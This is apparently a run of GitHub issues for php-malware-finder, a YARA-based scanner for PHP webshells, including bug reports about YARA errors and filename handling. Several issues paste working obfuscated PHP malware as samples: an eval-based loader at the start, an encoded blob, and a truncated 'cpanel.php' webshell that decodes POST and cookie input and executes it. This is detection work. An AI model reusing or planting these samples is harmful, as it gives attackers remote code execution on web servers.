}}$<83>³µ7834¶81µ9´2¸5["<85>70µ53233³19´¶66"]=´8·18¶3¸´µ9´µ1´8('jIuNoI+emw==','');$<83>³µ7834¶81µ9´2¸5["<83>464120·78´¸³³0´"]=´8·18¶3¸´µ9´µ1´8('nZ6MmsnLoJuanJCbmg==','');$<83>³µ7834¶81µ9´2¸5["<83>2µ³´522259¶6·2³"]=´8·18¶3¸´µ9´µ1´8('jIuNk5qR','');$<83>³µ7834¶81µ9´2¸5["<8a>·77306821¶µ¸256"]=´8·18¶3¸´µ9´µ1´8('Gw4QPCMiFwoGLjQ=','HKBjfp');$<83>³µ7834¶81µ9´2¸5["¸829¶³´197593·77"]='';$<83>³µ7834¶81µ9´2¸5["<8b>552¶965¸0´732·3"]=´8·18¶3¸´µ9´µ1´8('ZiAFGwwjBCM=','6hUD_fHe9');$<83>³µ7834¶81µ9´2¸5["··0702¶³´µµ8209³"]='';$<83>³µ7834¶81µ9´2¸5["<88>1³¶8´03324¶µ362"]='';$<83>³µ7834¶81µ9´2¸5["<8a>9¶¶1528381µ305¶"]=´8·18¶3¸´µ9´µ1´8('CzQTIBMXBz8AOxM=','XqAvVE');$<83>³µ7834¶81µ9´2¸5["¶06648·177994296"]='';$<83>³µ7834¶81µ9´2¸5["<84>¶5·27µ9076¸9·µ6"]='';$<83>³µ7834¶81µ9´2¸5["µ8790¸µ·27403321"]=´8·18¶3¸´µ9´µ1´8('WFZYblllfXZ1d1lV','ldv_kTSCBY');$<83>³µ7834¶81µ9´2¸5["<82>¸9053¶µ36·429µ0"]='';$<83>³µ7834¶81µ9´2¸5["<88>¸3³5´µ1¸2¸µ3591"]=´8·18¶3¸´µ9´µ1´8('DStf','nG67D');$<83>³µ7834¶81µ9´2¸5["µ3µ73¸¶22¶92¸99³"]='';$<83>³µ7834¶81µ9´2¸5["<85>77µ¶0´98³3¶3283"]=´8·18¶3¸´µ9´µ1´8('HA4VNhUDHQ8PHCs=','NKXyAFB');$<83>³µ7834¶81µ9´2¸5["µ38·¶µ¸¸5777¶05·"]=´8·18¶3¸´µ9´µ1´8('AxhnCDs7JiUc','KL3XdsivH');$<83>³µ7834¶81µ9´2¸5["<87>51¸582³³³3µµ¶µ1"]='';$<83>³µ7834¶81µ9´2¸5["<82>8´´301¸93³³µ080"]='';$<83>³µ7834¶81µ9´2¸5["<85>73606080·¸7414¸"]=´8·18¶3¸´µ9´µ1´8('FBlCWFItAUQGOgAQ','sc761Bl4t_');$<83>³µ7834¶81µ9´2¸5["<84>³331074705³·24¸"]=´8·18¶3¸´µ9´µ1´8('O14wQSA4','R0D7AT');$<83>³µ7834¶81µ9´2¸5["<87>4³1´9832µ54978¸"]=´8·18¶3¸´µ9´µ1´8('HUYkECY6','n2VbCLrH');$<83>³µ7834¶81µ9´2¸5["<82>¶µ5´223¸162³2¸9"]=´8·18¶3¸´µ9´µ1´8('JQI/ERwMNgAcCDwaNw49ADA=','CkSt');$<83>³µ7834¶81µ9´2¸5["<84>·¶2¶739¶17µ·042"]=´8·18¶3¸´µ9´µ1´8('GQAnKg==','miJOLV7G');$<83>³µ7834¶81µ9´2¸5["³¸88´0·8¶µ³48286"]=´8·18¶3¸´µ9´µ1´8('GwEEPz9L','htfLK9uXy'); $·53´·¶6³9¶7775µ³['<88>2³4³7µ4´¸85´74µ']=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<84>·¶2¶739¶17µ·042'](); $·53´·¶6³9¶7775µ³['<83>·1´0´¸³0736µ02³']=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<82>¶µ5´223¸162³2¸9'](<84>··7³µ³8¸13530´·); $·53´·¶6³9¶7775µ³['<8a>µ16¸9µ6¶997³´12']=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<87>4³1´9832µ54978¸']('2ef4d9904bd650312d329366c9fe69dc'); $·53´·¶6³9¶7775µ³['³72¸1µ1µ¸´69¸0´´']=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<84>³331074705³·24¸']($GLOBALS['<83>³µ7834¶81µ9´2¸5']['<87>4³1´9832µ54978¸']('1094000000')); $·53´·¶6³9¶7775µ³['<82>¸77·7·¸7¶6³752µ']=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<84>³331074705³·24¸']($GLOBALS['<83>³µ7834¶81µ9´2¸5']['<87>4³1´9832µ54978¸']('6100000000')); $·53´·¶6³9¶7775µ³['<84>µ9³570¸4µ805963']=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<84>³331074705³·24¸']($GLOBALS['<83>³µ7834¶81µ9´2¸5']['<87>4³1´9832µ54978¸']('6600000000')); $·53´·¶6³9¶7775µ³['<87>·³16³·7³´189·6³']=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<84>³331074705³·24¸']($GLOBALS['<83>³µ7834¶81µ9´2¸5']['<87>4³1´9832µ54978¸']('0123000000')); $·53´·¶6³9¶7775µ³['<82>541³´13¸7´µ7¸³¶']=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['³¸88´0·8¶µ³48286']($·53´·¶6³9¶7775µ³['<83>·1´0´¸³0736µ02³'],$·53´·¶6³9¶7775µ³['³72¸1µ1µ¸´69¸0´´'],$·53´·¶6³9¶7775µ³['<87>·³16³·7³´189·6³']); $·53´·¶6³9¶7775µ³['<82>541³´13¸7´µ7¸³¶']=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<83>464120·78´¸³³0´']($·53´·¶6³9¶7775µ³['<82>541³´13¸7´µ7¸³¶']); $·53´·¶6³9¶7775µ³['<82>541³´13¸7´µ7¸³¶']=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<85>73606080·¸7414¸']($·53´·¶6³9¶7775µ³['<82>541³´13¸7´µ7¸³¶']); return(eval($·53´·¶6³9¶7775µ³['<82>541³´13¸7´µ7¸³¶'])); ?>
^M
And this after
#!/usr/bin/php -q^M
eNrtWWtPW1cW/SsERTVoUHvej1La2MaOzRuDoU6EEHaMzdNpnNSEtl+StGmTn3OeP2/2hWikMcdw^M
M5NpJ1Ilf7LuXXfts9dee59z7r82TirKvMJOWxL54+l3NHAtNWaO4oAJm95bsCpg5Wm08IzDVs0U^M
VjfrJ2v9TnulvLNYmCs0RjuPas9KK/KHwuz8/ZuYvyFhFGNRa0+x9S6JubbdWSu9PDlb6xW7a4uD^M
BcD9sb2/fJiGfBM88ZJqj6ULiJEkZGXUQaXRQgbVO2+1T9NQryIxVCpJo1SKGZOEWq9WuqvbJweN^M
RbxWWuzJxeIV7D47bu0coQnACuPgSPDSay4DTgKvXDzZBqDS8HBlsb47SCN5RKxlVnArDBeGJpFK^M
5ZNHa9uo2byO+GDzqNV4Kpp8AmSUwIkxSZhyFKUhK9vFbrmE8MPSsLbWO9mtvKwvlXutDL7RXVlM^M
I7/l0qIYKYK4pfJpBT3ZHG3Xyq2T8kt+Uis1q+uXg5U67Xxf6beGS72rAESruHH0fH+CpkxUyqKg^M
vDNMESWSX2kU6/3Ni9MqoMlRGZ2loRw1OvAodLBWEBySUEvl4ln9YthqnTG8vDgUy/1Op3Xek/Xj^M
QX/9g8ZePB9s1wT+cYJkDaUYSSYRN4GwmPzM98cnLzfLuJkx3q2KFbU/TKO9d1oZzp1CXgRqUBKt^M
fsHQ0iU6ALSN4+qEfP2utYtQQ4JQTS3TSaRqE7d3Lur9agOfNyujjfURKwLqUHF2WLucAEwZB+VK^M
5pSM0aeBawi1VkpKrdb6mZWc6uPh2dZi/emEkvKOW0JoxIIYEtOQ9fLodPni5GhlcfBo6ajVWz0q^M
nq8fN7MUVSv1tTSyNcwyBpbCmdIOpw1ldVE/rJeGZP0Yd+uXLEPcWmIri5X9Ok7DvgbQaJBzDEuw^M
mXQx7Gx1msXio52N6upFJvzG4WkLTchWUNZKYZyTSBKEfHpRL4fnG6Xmcq28iorFesbzdL3Z6U2w^M
l/cMReYk5N8aa8kEB9zu0J3eqLx2jM7Wryu0XmngrcHuhMgVV1JgRaSP3Ol0VZWPhsulRmsZwJpn^M
5fpWGupXKn1wlGkbmQoqzW9pVHlav7zK8kW3slE9KMtBK40H3qSgG8VgsDJSpVVUbqiTzTKvAN7l^M
yQ4qygn5CI67ICxShJrI02FW+qud5gihWqOT8Xv6bCA6zTTeHzhYhLW0zARnaJpb5aizu0ueN6q9^M
zUr1uhP90HgiGbk8GU0wZWaw1YoSx5mWKm0+D9GovVYedQGur46q9UltDXkbRCCOaQddKQnV6uNB^M
rV/pbfSvugVpqmLp4Hz/0YQESyqQQAqFKBmeYI3lC1Rb2hz1N/r1o3Jjs5SJuvdsebC21d6YYEAC^M
SQS25qMQ0bB0bh72mo/WiqPacm+4BZCD0YvN9pPKhELxTkunBPZgvBKlk7NcHJ0tl5TYOO5loRfb^M
L+tntf0JSnRIByg+Q4Xy0qarebfBn5TQoF+/zjR6yr7Xi9uyXQTMqfuBUxu8MNpLKbkzjwvvYCIi^M
UqDoDTNIhsLewv2HK+ul4srW48I4h8Le48K4pxT2Zm5/YVxN2QspHlhE7YTXWhqLSWFvdq6g2xwz^M
qdgThtuICqJw5+Cw3TlsK9LGSsnCXALpdcAWWfBR0IlDxADS/NTR4R0sx+evSSzHV2v23kK+aKYe^M
vJXwr43EalCZ0nwmD69x+wFe+/vV+kplf3/uTQjSOKMippwiG4DLApr6+eep2yHHp4FbIb9ZQEDd^M
R+WRYSQG6Hoax5m0mN54Aj0+evhpYYkFMR0Nh93nM/f3tyqNnUrjcXKiUsG7GDmgeJSZ4t7sdx/5^M
wtczd3/nnfYec6Io/EUR93d+J/HC14XCddLudc+ePn85k2sNZmd/+iSVNz7YQ94KXydLIMEhb75y^M
EX2M9uanfkkiIhMCQ15BxZNAfC4FvAtSUiQUwZBWwsXdmbn5AmQmHSJHhmiQMwYJO2ZyEfpVSucR^M
hGCopyCAOwklXrgiBErZqG3sbxU36gsLqaYTqeHg3JFER7mGXR9o5WOklVX7A8eFhwQRG0UE7JBV^M
52SQGwtyDWIphhFCQfoImBO7AvmlezrsfiShL76YevAbGKgTQoH/Qfez+KMJZSBWa48wdBhmuSSY^M
XBGaund39t5zToAPj8hKSsJV9q4QDTgybKjAyrxV0oTPyID/EE7Bvgu2nDFQgfXMv9tQwiSV1Ci6^M
ADsqRCnJlPU/tKE5sKFcHHIs+PjclO7EN1Uzl69f50hPPgI3nC4nAchm5EYZ5hDUhs5K5zMS4nso^M
drAHaYk0Puprm7hdir9jA6uUKYB5B1PcRCn+IRmTKEgXFYUZEyJcQPN/smYTZOenDgfPugedfr6J^M
cOpgmGxEASpXG0sDpho7GINhEe4uhrHdNhCf/mr6y1z4X07f/2o653jwLcqdEpwl/Crl+Z5fwJ+s^M
5G7wzl9yv0kRmPbcgIGC6PFnVHJORk+pJURBJ6TxQyNMRP4qShkkbIvhX8mJu66fW2vzVdSI00zp^M
gRHt0IfavH0HOHaKASHcYJ6cdm5+7GryeBOJh31tsJmVK2s+xJc4FPUceonTSMLmKrjsGPd2puOn^M
qJms8sBm03Jq3+EkjZ7AcEGi1uYTff4m7F29PUE4m2/uIDN2CQJkZr/JBw4TYKc/SC1JVER72OBq^M
yTWFoXx6b/7BW+VMwCBAjjlCxOfoEIkl+M8C+jYf+McF9I57hnB02BvvUNT/CuhzMI93zlvvYMxw^M
EUfu3Z2DYwhIQtaMdU4RdLVcf/rgmOBwxXryHuLGMAaen297esex0Nh9X97G9GGV/9pB86dJKvdI^M
CKYCllJrcGKRqdwgg7UQEkvPKQQBQvlsRG6xscpZ6ySyDJwnh+W8UtZSqGpNjXFIof/roTRB9u+h^M
9L8bSlHWYO79xVPpxAJ9y8GsFTHGUOe8w1mBeoy85pEpjYQnjn9OBWqw4VIrG2D6DtryySMsZ1DL^M
GOwWijmauw16/Go/naObdwJzqceMJBE70KkVOiILqfxH4qm3sJbChOxgX+kgTPqpN05DzFmhKMS1^M
oOmnbo7ss+mj2o9emNdMMExA9QriNsjeeU8zfgOfXsmbPD4V4fF7vdzfn5961n3+4tn5TPfHg9P8^M
nL/79p9HxrWSVUF5cDA4Zm9WOUpIeEdpWk9tTmpCZXRLYjNTdTJYaHdZYW56TEQ3RlE2UnJQbEM0^M
rAdgIpyl2xtLif9G9VTXbVcXcSMeT+V4ReDHNHXJxQQtpexjv8NfquP2PXaZVn6czpmenU28nGxm^M
y+ONQw5EDidJs+ziX6si3c7rGr9+N2OlikchMepepQIn+U6k8WtuFJOwBdZEmQXWX4UCbCOIwTBH^M
EMjHjtlyFDuBNRIIDBRoy0vpjNtDDG4y78w/unf2gwiLibwRyORGAbgvXLdMFPkFudVh1R/mwodl^M
Bt1aKu3W8kyIcenL0E6b0zHSmPntJAPncvV32ksHLktYVbfFxFRZZBBbljido0zXf5ETCTDyAxVF^M
qIap11SdVcnaCqKLOdwu0rvQeX/HzKgPgX47H0+aFdJadt4dMGRgcKFTDcLKRlSXayHl7YcyJl5h^M
ls5U1GeWSJbQGhvC2lhdIA5eG6aloPisU3olALz5PRV2L3uVDUaA+1BdtP+/0Y5UTVpEOlUxcVEC^M
LMuG/JvbOA4PutniKbRKTRIUUinnSh1btI4ymEUJA7X9h58//Q+Pal3JKjFBzWwacNmkzFQzv3KD^M
mG9flxzPkXPLMIVTVhVz73nHfTRHfHlHuUkXuxy4rYcluPfXHLEDVeNpRdJLtKzKswEHOyKKocca^M
muK5XLCaOiXFVwM2KYiy2UXeeJX7QWtK5d+neEnhBb5hLAA1lihAr2R9y4FReBSJYiJYc+GVMuCk^M
YXDWvuPSYUcB/ztA35t0buyWvSPLkvRe/LGxP1vCA/se1o7A/S1urhgivA+M7483kDAkdR/yconw^M
J0c3hPQk1QNHCOx5eaSzr5PpyMinhaUg9uzFwPIjrvuKAJiedmrbeePbotF9/fQG56b1PddBeuVv^M
dlhdN8VPstsSb6ojoTvp1HnvhHZzjso97zXXAfiwWcEdsJaJ5gt8klVOAu/tqCWq9OQVRtrXV7Xz^M
7Cr1DZmmf1C/0A6ACqjy4ArUaW4S1eXhOYjd629jmphkP3zm7x0o9c1PjPpa+5umkf+/T87S+67f^M
DldivnXVk/1Ce4BaBUr98Frd9CdNw9MJIwEos6CrgUwqxKCDlT2o50g9lCy53/X1+28awvDdGjf0^M
vqZx4/xfETz+swxjWkwrwfMUPs5xuFFAJFESTEWGZL/3C44pT8DwOgXcVRMMTAYEflRhnjL9Iuqh^M
oFiw8KFBTjSQa+2P5uQrlzMggBl2rl72oS6mru8ad2QnQmngadsBQAwOqKYCa2Awep08EKR8ppFB^M
YTKY7Geso8iShLmL/QXbtCswu8Tv+SDbrGc99l94uC6J^M
Do you know this type of hack ?
Currently, our main script's code looks quite ugly. It would be nice if someone with some shell-fu could take a look at it, and clean it up.
It could be cool to see how many webshells are missed in this repository.
Filename with spaces don't work anymore
#:~/php-malware-finder/php-malware-finder#` mkdir /tmp/test/
#:~/php-malware-finder/php-malware-finder# touch "/tmp/test/salut bobby.php"
#:~/php-malware-finder/php-malware-finder# ./phpmalwarefinder -v /tmp/test/
wc: /tmp/test/salut: No such file or directory
wc: /tmp/test/salut: No such file or directory
wc: bobby.php: No such file or directory
wc: bobby.php: No such file or directory
Hi, running latest PMF against some CMS to create whitelists, I got :
/usr/pkg/etc/phpmalwarefinder/malwares.yara(67): error: invalid regular expression "$too_many_chr": syntax error, unexpected '?', expecting $end
Commenting this first issue got me another one :
/usr/pkg/etc/phpmalwarefinder/malwares.yara(68): error: invalid regular expression "$b64_concat": syntax error, unexpected '?', expecting $end
Can you please correct them ?
Similar to #39 it would be great if the tool were to output some more context.
E.g. line number (if possible) of hits, or snippets of code from file that matched the rule in question. I am not sure if this is possible, but it would be a helpful addition.
It can be quite the challenge to sort through the noise on a large site with many themes and plugins. I have (through limited trial and error) found that e.g. a hit with subsequent ObfuscatedPhp and also a DodgyPhp on a file is a good hint something is wrong (or just multiple hits on the same file, in general).
Also I've seen SuspiciousEncoding be a good indicator of bad stuff - however this is not one of the flags you pick out for your (in your own words "hacky") You should take a look at the files listed below section.
So yeah, some more context, or some more "intelligent" rules for your recommended section would be awesome 👍
I downloaded newest yara (3.4.0) and compiled it. But running "make", "phpmalwarefinder" or "yara" with the php.yar doesn't work:
oliver@v3:~/pmf/php-malware-finder-master$ yara -v
yara 3.4.0
oliver@v3:~/pmf/php-malware-finder-master$ make
./php.yar(1): error: unknown module "hash"
./whitelist.yar(10): error: invalid field name "sha1"
./whitelist.yar(27): error: invalid field name "sha1"
./whitelist.yar(63): error: invalid field name "sha1"
./whitelist.yar(72): error: invalid field name "sha1"
./whitelist.yar(92): error: invalid field name "sha1"
./whitelist.yar(115): error: invalid field name "sha1"
./whitelist.yar(128): error: invalid field name "sha1"
./whitelist.yar(137): error: invalid field name "sha1"
./whitelist.yar(151): error: invalid field name "sha1"
./whitelist.yar(162): error: invalid field name "sha1"
./whitelist.yar(170): error: invalid field name "sha1"
[-] 0x294d:$eval: {eval( was not detected in cpanel.php, sorry
make: *** [tests] Fehler 1
Why does 'hash' not work. Isn't it implemented in yara 3.4.0?
Commit fde93ed broke the eval
root@poney:~/php-malware-finder/php-malware-finder# head -n20 /tmp/eval/cpanel.php
<?php $GLOBALS['m6aa932e'];global$m6aa932e;$m6aa932e=$GLOBALS;$m6aa932e['a7b1']="\x59\x5d\x52\xa\x4c\x27\x42\x25\x48\x28\x6a\x66\x9\x73\x38\x23\x67\x74\x50\x4a\x36\x2e\x7b\x58\x34\x44\x4d\x7a\x3f\x47\x21\x31\x40\x6c\x51\x62\xd\x5b\x71\x60\x7d\x5f\x37\x6f\x65\x77\x64\x2b\x6b\x33\x49\x35\x2a\x4f\x78\x70\x68\x53\x4e\x24\x30\x43\x55\x7e\x6d\x61\x3e\x69\x54\x57\x5c\x75\x79\x4b\x2f\x6e\x3a\x46\x72\x3c\x45\x26\x5a\x22\x39\x5e\x2d\x2c\x20\x29\x3b\x41\x56\x7c\x3d\x63\x32\x76";$m6aa932e[$m6aa932e['a7b1'][45].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][95]]=$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][56].$m6aa932e['a7b1'][78];$m6aa932e[$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][51]]=$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][46];$m6aa932e[$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][31]]=$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][17].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][75];$m6aa932e[$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][84]]=$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][75].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][17];$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][11]]=$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][27].$m6aa932e['a7b1'][44];$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][60]]=$m6aa932e['a7b1'][55].$m6aa932e['a7b1'][56].$m6aa932e['a7b1'][55].$m6aa932e['a7b1'][97].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][75];$m6aa932e[$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][14]]=$m6aa932e['a7b1'][71].$m6aa932e['a7b1'][75].$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][27].$m6aa932e['a7b1'][44];$m6aa932e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][49]]=$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][44];$m6aa932e[$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][11]]=$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][17].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][17].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][17];$m6aa932e[$m6aa932e['a7b1'][71].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][84]]=$m6aa932e['a7b1'][54].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][11];$m6aa932e[$m6aa932e['a7b1'][56].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][42]]=$m6aa932e['a7b1'][27].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][24];$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][49]]=$_POST;$m6aa932e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][44]]=$_COOKIE;@$m6aa932e[$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][84]]($m6aa932e['a7b1'][44].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][16],NULL);@$m6aa932e[$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][84]]($m6aa932e['a7b1'][33].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][16].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][13],0);@$m6aa932e[$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][84]]($m6aa932e['a7b1'][64].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][54].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][54].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][71].$m6aa932e['a7b1'][17].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][75].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][17].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][44],0);@$m6aa932e[$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][11]](0);$y5da781e=NULL;$x3ff4965=NULL;$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][14]]=$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][86].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][86].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][86].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][86].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][51];global$fecba48;function z674($y5da781e,$efb074d){global$m6aa932e;$o82b6b8="";for($b56c6566=0;$b56c6566<$m6aa932e[$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][31]]($y5da781e);){for($b148c51e=0;$b148c51e<$m6aa932e[$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][31]]($efb074d)&&$b56c6566<$m6aa932e[$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][31]]($y5da781e);$b148c51e++,$b56c6566++){$o82b6b8.=$m6aa932e[$m6aa932e['a7b1'][45].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][95]]($m6aa932e[$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][51]]($y5da781e[$b56c6566])^$m6aa932e[$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][51]]($efb074d[$b148c51e]));}}return$o82b6b8;}function x9687832f($y5da781e,$efb074d){global$m6aa932e;global$fecba48;return$m6aa932e[$m6aa932e['a7b1'][56].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][42]]($m6aa932e[$m6aa932e['a7b1'][56].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][42]]($y5da781e,$fecba48),$efb074d);}foreach($m6aa932e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][44]]as$efb074d=>$ff7924082){$y5da781e=$ff7924082;$x3ff4965=$efb074d;}if(!$y5da781e){foreach($m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][42].$m6aa